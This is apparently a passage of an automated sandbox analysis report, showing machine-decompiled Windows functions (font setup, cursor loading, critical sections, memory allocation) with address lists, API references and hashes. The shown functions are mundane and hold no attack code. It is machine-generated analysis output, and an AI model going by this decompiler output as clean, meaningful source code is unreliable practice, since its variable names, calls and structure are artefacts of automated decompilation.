                                                                        0x0045514f
                                                                        0x0045514f
                                                                        0x00455155
                                                                        0x00455158
                                                                        0x0045516b
                                                                        0x00455173
                                                                        0x00455186
                                                                        0x00455193
                                                                        0x00455198
                                                                        0x0045519a
                                                                        0x0045519c
                                                                        0x004551a5
                                                                        0x004551a5
                                                                        0x004551b2
                                                                        0x004551b9
                                                                        0x004551bb
                                                                        0x004551bb
                                                                        0x004551c6
                                                                        0x004551cb
                                                                        0x004551dc
                                                                        0x004551e1
                                                                        0x004551e9
                                                                        0x004551ed
                                                                        0x004551ed
                                                                        0x004551f2
                                                                        0x004551f6
                                                                        0x004551fa
                                                                        0x004551fe
                                                                        0x00455207
                                                                        0x0045520f
                                                                        0x00455216
                                                                        0x0045521b
                                                                        0x00455221
                                                                        0x00455223
                                                                        0x00455228
                                                                        0x0045522f
                                                                        0x00455239

                                                                        APIs
                                                                        • LoadIconA.USER32(00400000,MAINICON), ref: 00455141
                                                                        • GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,004419E8,00000000,00000000,?,00000000,?,00000000,00441A50), ref: 00455173
                                                                        • OemToCharA.USER32(?,?), ref: 00455186
                                                                        • CharLowerA.USER32(?,00400000,?,00000100,?,?,?,004419E8,00000000,00000000,?,00000000,?,00000000,00441A50), ref: 004551C6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Char$FileIconLoadLowerModuleName
                                                                        • String ID: ,`I$4`I$MAINICON
                                                                        • API String ID: 3935243913-2513232985
                                                                        • Opcode ID: 8dedb8289d0bfbca90d2ab047fa0c34e34e9769703f07b68c9575f29396866f2
                                                                        • Instruction ID: 7165f6ef90a4096c26261ca2b15fb1af64d1f8c3d9a5e3545fba0b08bd0ef4cb
                                                                        • Opcode Fuzzy Hash: 8dedb8289d0bfbca90d2ab047fa0c34e34e9769703f07b68c9575f29396866f2
                                                                        • Instruction Fuzzy Hash: 59515F706046449FDB41DF29C8C5B867BE4AB15308F4481BAEC48CF397D7BAD9888B69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00454754, Relevance: 10.6, APIs: 7, Instructions: 89COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 89%
                                                                        			E00454754(void* __eax, void* __ebx, void* __ecx, void* __edi) {
				char _v5;
				struct tagLOGFONTA _v65;
				struct tagLOGFONTA _v185;
				struct tagLOGFONTA _v245;
				void _v405;
				void* _t23;
				int _t27;
				void* _t30;
				intOrPtr _t38;
				struct HFONT__* _t41;
				struct HFONT__* _t45;
				struct HFONT__* _t49;
				intOrPtr _t52;
				intOrPtr _t54;
				void* _t57;
				void* _t72;
				void* _t74;
				void* _t75;
				intOrPtr _t76;

				_t72 = __edi;
				_t74 = _t75;
				_t76 = _t75 + 0xfffffe6c;
				_t57 = __eax;
				_v5 = 0;
				if( *0x496c04 != 0) {
					_t54 =  *0x496c04; // 0x2150d40
					_v5 =  *((intOrPtr*)(_t54 + 0x88));
				}
				_push(_t74);
				_push(0x454899);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				if( *0x496c04 != 0) {
					_t52 =  *0x496c04; // 0x2150d40
					E00456B68(_t52, 0);
				}
				if(SystemParametersInfoA(0x1f, 0x3c,  &_v65, 0) == 0) {
					_t23 = GetStockObject(0xd);
					_t7 = _t57 + 0x84; // 0x38004010
					E0041F620( *_t7, _t23, _t72);
				} else {
					_t49 = CreateFontIndirectA( &_v65); // executed
					_t6 = _t57 + 0x84; // 0x38004010
					E0041F620( *_t6, _t49, _t72);
				}
				_v405 = 0x154;
				_t27 = SystemParametersInfoA(0x29, 0,  &_v405, 0); // executed
				if(_t27 == 0) {
					_t14 = _t57 + 0x80; // 0xac000000
					E0041F704( *_t14, 8);
					_t30 = GetStockObject(0xd);
					_t15 = _t57 + 0x88; // 0x90000000
					E0041F620( *_t15, _t30, _t72);
				} else {
					_t41 = CreateFontIndirectA( &_v185);
					_t11 = _t57 + 0x80; // 0xac000000
					E0041F620( *_t11, _t41, _t72);
					_t45 = CreateFontIndirectA( &_v245);
					_t13 = _t57 + 0x88; // 0x90000000
					E0041F620( *_t13, _t45, _t72);
				}
				_t16 = _t57 + 0x80; // 0xac000000
				E0041F464( *_t16, 0x80000017);
				_t17 = _t57 + 0x88; // 0x90000000
				E0041F464( *_t17, 0x80000007);
				 *[fs:eax] = 0x80000007;
				_push(0x4548a0);
				if( *0x496c04 != 0) {
					_t38 =  *0x496c04; // 0x2150d40
					return E00456B68(_t38, _v5);
				}
				return 0;
			}






















                                                                        0x00454754
                                                                        0x00454755
                                                                        0x00454757
                                                                        0x0045475e
                                                                        0x00454760
                                                                        0x0045476b
                                                                        0x0045476d
                                                                        0x00454778
                                                                        0x00454778
                                                                        0x0045477d
                                                                        0x0045477e
                                                                        0x00454783
                                                                        0x00454786
                                                                        0x00454790
                                                                        0x00454794
                                                                        0x00454799
                                                                        0x00454799
                                                                        0x004547af
                                                                        0x004547cb
                                                                        0x004547d2
                                                                        0x004547d8
                                                                        0x004547b1
                                                                        0x004547b5
                                                                        0x004547bc
                                                                        0x004547c2
                                                                        0x004547c2
                                                                        0x004547dd
                                                                        0x004547f4
                                                                        0x004547fb
                                                                        0x00454831
                                                                        0x0045483c
                                                                        0x00454843
                                                                        0x0045484a
                                                                        0x00454850
                                                                        0x004547fd
                                                                        0x00454804
                                                                        0x0045480b
                                                                        0x00454811
                                                                        0x0045481d
                                                                        0x00454824
                                                                        0x0045482a
                                                                        0x0045482a
                                                                        0x00454855
                                                                        0x00454860
                                                                        0x00454865
                                                                        0x00454870
                                                                        0x0045487a
                                                                        0x0045487d
                                                                        0x00454889
                                                                        0x0045488e
                                                                        0x00000000
                                                                        0x00454893
                                                                        0x00454898

                                                                        APIs
                                                                        • SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 004547A8
                                                                        • CreateFontIndirectA.GDI32(?), ref: 004547B5
                                                                        • GetStockObject.GDI32(0000000D), ref: 004547CB
                                                                          • Part of subcall function 0041F704: MulDiv.KERNEL32(00000000,?,00000048), ref: 0041F711
                                                                        • SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 004547F4
                                                                        • CreateFontIndirectA.GDI32(?), ref: 00454804
                                                                        • CreateFontIndirectA.GDI32(?), ref: 0045481D
                                                                        • GetStockObject.GDI32(0000000D), ref: 00454843
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CreateFontIndirect$InfoObjectParametersStockSystem
                                                                        • String ID:
                                                                        • API String ID: 2891467149-0
                                                                        • Opcode ID: 6f8d4d31483a260ff14e10f917ad7f427b490c81166326aeb79ff36f3aed0e0f
                                                                        • Instruction ID: 54e94ae64045f866c9d0fd814db0631e9b26727ee0c17caded26134f85bec22f
                                                                        • Opcode Fuzzy Hash: 6f8d4d31483a260ff14e10f917ad7f427b490c81166326aeb79ff36f3aed0e0f
                                                                        • Instruction Fuzzy Hash: A7316A30604244ABDB50FBA5DC42B9633E5AB44308F5580B7BD4CDF2A7DE78994EC729
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00453F78, Relevance: 6.1, APIs: 4, Instructions: 99COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 84%
                                                                        			E00453F78(char __edx, void* __edi) {
				char _v5;
				void* __ebx;
				void* __ecx;
				void* __ebp;
				intOrPtr _t25;
				intOrPtr* _t28;
				intOrPtr* _t29;
				intOrPtr _t42;
				intOrPtr* _t45;
				intOrPtr _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t62;
				void* _t63;
				char _t64;
				void* _t74;
				intOrPtr _t75;
				void* _t76;
				void* _t77;

				_t74 = __edi;
				_t64 = __edx;
				if(__edx != 0) {
					_t77 = _t77 + 0xfffffff0;
					_t25 = E00403940(_t25, _t76);
				}
				_v5 = _t64;
				_t62 = _t25;
				E0041C1DC(_t63, 0);
				_t28 =  *0x49591c; // 0x47a458
				 *((intOrPtr*)(_t28 + 4)) = _t62;
				 *_t28 = 0x45431c;
				_t29 =  *0x495928; // 0x47a460
				 *((intOrPtr*)(_t29 + 4)) = _t62;
				 *_t29 = 0x454328;
				E00454334(_t62);
				 *((intOrPtr*)(_t62 + 0x3c)) = GetKeyboardLayout(0);
				 *((intOrPtr*)(_t62 + 0x4c)) = E004035AC(1);
				 *((intOrPtr*)(_t62 + 0x50)) = E004035AC(1);
				 *((intOrPtr*)(_t62 + 0x54)) = E004035AC(1);
				 *((intOrPtr*)(_t62 + 0x58)) = E004035AC(1);
				_t42 = E004035AC(1);
				 *((intOrPtr*)(_t62 + 0x7c)) = _t42;
				L00406EB4();
				_t75 = _t42;
				L00406B8C();
				 *((intOrPtr*)(_t62 + 0x40)) = _t42;
				L00407124();
				_t11 = _t62 + 0x58; // 0x44d3f86e
				_t45 =  *0x495a58; // 0x496ab8
				 *((intOrPtr*)( *_t45))(0, 0, E004507FC,  *_t11, 0, _t75, _t75, 0x5a, 0);
				 *((intOrPtr*)(_t62 + 0x84)) = E0041F290(1);
				 *((intOrPtr*)(_t62 + 0x88)) = E0041F290(1);
				 *((intOrPtr*)(_t62 + 0x80)) = E0041F290(1);
				E00454754(_t62, _t62, _t63, _t74);
				_t15 = _t62 + 0x84; // 0x38004010
				_t56 =  *_t15;
				 *((intOrPtr*)(_t56 + 0xc)) = _t62;
				 *((intOrPtr*)(_t56 + 8)) = 0x454630;
				_t18 = _t62 + 0x88; // 0x90000000
				_t57 =  *_t18;
				 *((intOrPtr*)(_t57 + 0xc)) = _t62;
				 *((intOrPtr*)(_t57 + 8)) = 0x454630;
				_t21 = _t62 + 0x80; // 0xac000000
				_t58 =  *_t21;
				 *((intOrPtr*)(_t58 + 0xc)) = _t62;
				 *((intOrPtr*)(_t58 + 8)) = 0x454630;
				_t59 = _t62;
				if(_v5 != 0) {
					E00403998(_t59);
					_pop( *[fs:0x0]);
				}
				return _t62;
			}























                                                                        0x00453f78
                                                                        0x00453f78
                                                                        0x00453f80
                                                                        0x00453f82
                                                                        0x00453f85
                                                                        0x00453f85
                                                                        0x00453f8a
                                                                        0x00453f8d
                                                                        0x00453f93
                                                                        0x00453f98
                                                                        0x00453f9d
                                                                        0x00453fa0
                                                                        0x00453fa6
                                                                        0x00453fab
                                                                        0x00453fae
                                                                        0x00453fb6
                                                                        0x00453fc2
                                                                        0x00453fd1
                                                                        0x00453fe0
                                                                        0x00453fef
                                                                        0x00453ffe
                                                                        0x00454008
                                                                        0x0045400d
                                                                        0x00454012
                                                                        0x00454017
                                                                        0x0045401c
                                                                        0x00454021
                                                                        0x00454027
                                                                        0x0045402c
                                                                        0x0045403a
                                                                        0x00454041
                                                                        0x0045404f
                                                                        0x00454061
                                                                        0x00454073
                                                                        0x0045407b
                                                                        0x00454080
                                                                        0x00454080
                                                                        0x00454086
                                                                        0x00454089
                                                                        0x00454090
                                                                        0x00454090
                                                                        0x00454096
                                                                        0x00454099
                                                                        0x004540a0
                                                                        0x004540a0
                                                                        0x004540a6
                                                                        0x004540a9
                                                                        0x004540b0
                                                                        0x004540b6
                                                                        0x004540b8
                                                                        0x004540bd
                                                                        0x004540c4
                                                                        0x004540cd

                                                                        APIs
                                                                        • GetKeyboardLayout.USER32 ref: 00453FBD
                                                                        • 72E7AC50.USER32(00000000,00000000,?,?,00000000,?,004419D2,00000000,00000000,?,00000000,?,00000000,00441A50), ref: 00454012
                                                                        • 72E7AD70.GDI32(00000000,0000005A,00000000,00000000,?,?,00000000,?,004419D2,00000000,00000000,?,00000000,?,00000000,00441A50), ref: 0045401C
                                                                        • 72E7B380.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,?,?,00000000,?,004419D2,00000000,00000000,?,00000000,?), ref: 00454027
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: B380KeyboardLayout
                                                                        • String ID:
                                                                        • API String ID: 648844651-0
                                                                        • Opcode ID: 7cd0441e299d4dd76d954c66a31d9b821428746ca5e7d7290b214efdd2fa17c6
                                                                        • Instruction ID: b3b2c94ae3b9948f2a134b370cea85584a5ef29b9b8697dbbfd7147a4e89023a
                                                                        • Opcode Fuzzy Hash: 7cd0441e299d4dd76d954c66a31d9b821428746ca5e7d7290b214efdd2fa17c6
                                                                        • Instruction Fuzzy Hash: 873109B06112409FD740EF2ADCC1B857BE4AB05319F0490BAED08CF3A7DB7A9849DB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00401AA0, Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 68%
                                                                        			E00401AA0() {
				void* _t11;
				signed int _t13;
				intOrPtr _t19;
				void* _t20;
				intOrPtr _t23;

				_push(_t23);
				_push(E00401B56);
				_push( *[fs:edx]);
				 *[fs:edx] = _t23;
				_push(0x4965c4);
				L004013F4();
				if( *0x496049 != 0) {
					_push(0x4965c4);
					L004013FC();
				}
				E00401464(0x4965e4);
				E00401464(0x4965f4);
				E00401464(0x496620);
				_t11 = LocalAlloc(0, 0xff8); // executed
				 *0x49661c = _t11;
				if( *0x49661c != 0) {
					_t13 = 3;
					do {
						_t20 =  *0x49661c; // 0x69cc50
						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
						_t13 = _t13 + 1;
					} while (_t13 != 0x401);
					 *((intOrPtr*)(0x496608)) = 0x496604;
					 *0x496604 = 0x496604;
					 *0x496610 = 0x496604;
					 *0x4965bc = 1;
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(E00401B5D);
				if( *0x496049 != 0) {
					_push(0x4965c4);
					L00401404();
					return 0;
				}
				return 0;
			}








                                                                        0x00401aa5
                                                                        0x00401aa6
                                                                        0x00401aab
                                                                        0x00401aae
                                                                        0x00401ab1
                                                                        0x00401ab6
                                                                        0x00401ac2
                                                                        0x00401ac4
                                                                        0x00401ac9
                                                                        0x00401ac9
                                                                        0x00401ad3
                                                                        0x00401add
                                                                        0x00401ae7
                                                                        0x00401af3
                                                                        0x00401af8
                                                                        0x00401b04
                                                                        0x00401b06
                                                                        0x00401b0b
                                                                        0x00401b0b
                                                                        0x00401b13
                                                                        0x00401b17
                                                                        0x00401b18
                                                                        0x00401b24
                                                                        0x00401b27
                                                                        0x00401b29
                                                                        0x00401b2e
                                                                        0x00401b2e
                                                                        0x00401b37
                                                                        0x00401b3a
                                                                        0x00401b3d
                                                                        0x00401b49
                                                                        0x00401b4b
                                                                        0x00401b50
                                                                        0x00000000
                                                                        0x00401b50
                                                                        0x00401b55

                                                                        APIs
                                                                        • RtlInitializeCriticalSection.KERNEL32(004965C4,00000000,00401B56,?,?,0040233A,021514A0,?,00000000,?,?,00401D29,00401D3E,00401E8F), ref: 00401AB6
                                                                        • RtlEnterCriticalSection.KERNEL32(004965C4,004965C4,00000000,00401B56,?,?,0040233A,021514A0,?,00000000,?,?,00401D29,00401D3E,00401E8F), ref: 00401AC9
                                                                        • LocalAlloc.KERNEL32(00000000,00000FF8,004965C4,00000000,00401B56,?,?,0040233A,021514A0,?,00000000,?,?,00401D29,00401D3E,00401E8F), ref: 00401AF3
                                                                        • RtlLeaveCriticalSection.KERNEL32(004965C4,00401B5D,00000000,00401B56,?,?,0040233A,021514A0,?,00000000,?,?,00401D29,00401D3E,00401E8F), ref: 00401B50
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                        • String ID:
                                                                        • API String ID: 730355536-0
                                                                        • Opcode ID: 4b702e9c7921f94c24e7c027581dd264e32c8e6686b16004a7e4da62ebbcb975
                                                                        • Instruction ID: e3fa4044cabce3705ee1953a6e939e98ba2ac419389a6aed450bfef70ff098bf
                                                                        • Opcode Fuzzy Hash: 4b702e9c7921f94c24e7c027581dd264e32c8e6686b16004a7e4da62ebbcb975
                                                                        • Instruction Fuzzy Hash: 440180B0644240AEEB26AB6AA806B197FE5D755718F07803FE000A66F2DBBD5C45CF1D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00427300, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 58%
                                                                        			E00427300(int _a4) {
				void* __ebx;
				void* __ebp;
				signed int _t2;
				signed int _t3;
				void* _t7;
				int _t8;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t18;

				_t8 = _a4;
				if( *0x496ac4 == 0) {
					 *0x496a9c = E00427218(0, _t8,  *0x496a9c, _t17, _t18);
					_t7 =  *0x496a9c(_t8); // executed
					return _t7;
				}
				_t3 = _t2 | 0xffffffff;
				_t12 = _t8 + 0xffffffb4 - 2;
				__eflags = _t12;
				if(__eflags < 0) {
					_t3 = 0;
				} else {
					if(__eflags == 0) {
						_t8 = 0;
					} else {
						_t13 = _t12 - 1;
						__eflags = _t13;
						if(_t13 == 0) {
							_t8 = 1;
						} else {
							__eflags = _t13 - 0xffffffffffffffff;
							if(_t13 - 0xffffffffffffffff < 0) {
								_t3 = 1;
							}
						}
					}
				}
				__eflags = _t3 - 0xffffffff;
				if(_t3 != 0xffffffff) {
					return _t3;
				} else {
					return GetSystemMetrics(_t8);
				}
			}













                                                                        0x00427304
                                                                        0x0042730e
                                                                        0x00427322
                                                                        0x00427328
                                                                        0x00000000
                                                                        0x00427328
                                                                        0x00427330
                                                                        0x00427338
                                                                        0x00427338
                                                                        0x0042733b
                                                                        0x0042734f
                                                                        0x0042733d
                                                                        0x0042733d
                                                                        0x00427353
                                                                        0x0042733f
                                                                        0x0042733f
                                                                        0x0042733f
                                                                        0x00427340
                                                                        0x00427357
                                                                        0x00427342
                                                                        0x00427343
                                                                        0x00427346
                                                                        0x00427348
                                                                        0x00427348
                                                                        0x00427346
                                                                        0x00427340
                                                                        0x0042733d
                                                                        0x0042735c
                                                                        0x0042735f
                                                                        0x00427369
                                                                        0x00427361
                                                                        0x00000000
                                                                        0x00427362

                                                                        APIs
                                                                        • GetSystemMetrics.USER32 ref: 00427362
                                                                          • Part of subcall function 00427218: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00427298
                                                                        • KiUserCallbackDispatcher.NTDLL ref: 00427328
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: AddressCallbackDispatcherMetricsProcSystemUser
                                                                        • String ID: GetSystemMetrics
                                                                        • API String ID: 54681038-96882338
                                                                        • Opcode ID: 55446e7e76123103b454da646c455967d357e49010d04799ca10e5a3ca25f6d8
                                                                        • Instruction ID: 5b839be3fabe59c0cd91bf616db641c7d3104d278b4c8a76039aace42cce4069
                                                                        • Opcode Fuzzy Hash: 55446e7e76123103b454da646c455967d357e49010d04799ca10e5a3ca25f6d8
                                                                        • Instruction Fuzzy Hash: CBF0623171C6124AC610CA74BC855263546A75A374FE88733ED16966E1C23D9845E25D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040218C, Relevance: 3.1, APIs: 2, Instructions: 124COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00401AA0: RtlInitializeCriticalSection.KERNEL32(004965C4,00000000,00401B56,?,?,0040233A,021514A0,?,00000000,?,?,00401D29,00401D3E,00401E8F), ref: 00401AB6
                                                                          • Part of subcall function 00401AA0: RtlEnterCriticalSection.KERNEL32(004965C4,004965C4,00000000,00401B56,?,?,0040233A,021514A0,?,00000000,?,?,00401D29,00401D3E,00401E8F), ref: 00401AC9
                                                                          • Part of subcall function 00401AA0: LocalAlloc.KERNEL32(00000000,00000FF8,004965C4,00000000,00401B56,?,?,0040233A,021514A0,?,00000000,?,?,00401D29,00401D3E,00401E8F), ref: 00401AF3
                                                                          • Part of subcall function 00401AA0: RtlLeaveCriticalSection.KERNEL32(004965C4,00401B5D,00000000,00401B56,?,?,0040233A,021514A0,?,00000000,?,?,00401D29,00401D3E,00401E8F), ref: 00401B50
                                                                        • RtlEnterCriticalSection.KERNEL32(004965C4,00000000,00402308), ref: 004021D7
                                                                        • RtlLeaveCriticalSection.KERNEL32(004965C4,0040230F), ref: 00402302
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                        • String ID:
                                                                        • API String ID: 2227675388-0
                                                                        • Opcode ID: 35d58ee3540cf062b3df7ea74c26ca495e5eebe2a6b1ad0ad556c1b196560d5d
                                                                        • Instruction ID: 83bdff73d5a1a07a892888f5c36523991864ad6eb74594df81dd07f85809d88a
                                                                        • Opcode Fuzzy Hash: 35d58ee3540cf062b3df7ea74c26ca495e5eebe2a6b1ad0ad556c1b196560d5d
                                                                        • Instruction Fuzzy Hash: B941EEB2A006009FD714CF69EE85629B7A4EB65328B27427FD801E77E1E67C9C418B1C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00454334, Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00454334(void* __eax) {
				struct HICON__* _t5;
				void* _t7;
				void* _t8;
				struct HINSTANCE__* _t11;
				CHAR** _t12;
				void* _t13;

				_t13 = __eax;
				 *((intOrPtr*)(_t13 + 0x60)) = LoadCursorA(0, 0x7f00);
				_t8 = 0xffffffea;
				_t12 = 0x47ab90;
				do {
					if(_t8 < 0xffffffef || _t8 > 0xfffffff4) {
						if(_t8 != 0xffffffeb) {
							_t11 = 0;
						} else {
							goto L4;
						}
					} else {
						L4:
						_t11 =  *0x496714; // 0x400000
					}
					_t5 = LoadCursorA(_t11,  *_t12); // executed
					_t7 = E004543EC(_t13, _t5, _t8);
					_t8 = _t8 + 1;
					_t12 =  &(_t12[1]);
				} while (_t8 != 0xffffffff);
				return _t7;
			}









                                                                        0x00454338
                                                                        0x00454346
                                                                        0x00454349
                                                                        0x0045434e
                                                                        0x00454353
                                                                        0x00454356
                                                                        0x00454360
                                                                        0x0045436a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00454362
                                                                        0x00454362
                                                                        0x00454362
                                                                        0x00454362
                                                                        0x00454370
                                                                        0x0045437b
                                                                        0x00454380
                                                                        0x00454381
                                                                        0x00454384
                                                                        0x0045438d

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CursorLoad
                                                                        • String ID:
                                                                        • API String ID: 3238433803-0
                                                                        • Opcode ID: d761e11c61c979bdf821915641afd05efaccb41e9284a7765425020a359a9d55
                                                                        • Instruction ID: 45ff5c45349f62151306836f9853a517dcd13b5311b8dd786089dfbce635c089
                                                                        • Opcode Fuzzy Hash: d761e11c61c979bdf821915641afd05efaccb41e9284a7765425020a359a9d55
                                                                        • Instruction Fuzzy Hash: 51F0E911B00241479A50557D4CC096E3254DBC273DB210377FE79CE2F2C62D2C858159
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004015B8, Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E004015B8(void* __eax, void** __edx) {
				void* _t3;
				void** _t8;
				void* _t11;
				long _t14;

				_t8 = __edx;
				if(__eax >= 0x100000) {
					_t14 = __eax + 0x0000ffff & 0xffff0000;
				} else {
					_t14 = 0x100000;
				}
				_t8[1] = _t14;
				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
				_t11 = _t3;
				 *_t8 = _t11;
				if(_t11 != 0) {
					_t3 = E0040146C(0x4965e4, _t8);
					if(_t3 == 0) {
						VirtualFree( *_t8, 0, 0x8000);
						 *_t8 = 0;
						return 0;
					}
				}
				return _t3;
			}







                                                                        0x004015bb
                                                                        0x004015c5
                                                                        0x004015d4
                                                                        0x004015c7
                                                                        0x004015c7
                                                                        0x004015c7
                                                                        0x004015da
                                                                        0x004015e7
                                                                        0x004015ec
                                                                        0x004015ee
                                                                        0x004015f2
                                                                        0x004015fb
                                                                        0x00401602
                                                                        0x0040160e
                                                                        0x00401615
                                                                        0x00000000
                                                                        0x00401615
                                                                        0x00401602
                                                                        0x0040161a

                                                                        APIs
                                                                        • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004018C1), ref: 004015E7
                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004018C1), ref: 0040160E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
